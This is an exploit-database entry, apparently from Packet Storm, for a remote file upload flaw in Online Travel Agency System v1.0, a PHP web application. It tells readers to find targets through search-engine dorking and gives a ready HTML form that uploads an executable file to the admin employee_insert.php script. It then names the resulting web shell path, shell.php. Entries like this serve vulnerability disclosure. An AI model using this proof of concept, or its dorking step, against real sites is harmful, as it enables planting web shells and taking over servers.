Share
## https://sploitus.com/exploit?id=PACKETSTORM:181270
=============================================================================================================================================  
| # Title : Online Travel Agency System v1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/online-travel-agency-system-using-php.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] Go to the line 8.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php.  
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html>  
<head>  
<title>Employee Form</title>  
</head>  
<body>  
<h2>Employee Form</h2>  
<form action="http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php" method="post" enctype="multipart/form-data">  
<label for="userfile">Profile Picture:</label>  
<input type="file" id="userfile" name="userfile" required><br><br>  
  
<input type="submit" name="employeeform" value="Submit">  
</form>  
</body>  
</html>  
  
  
[+] http://127.0.0.1/php-travel-agency-system-master/admin/user/shell.php  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================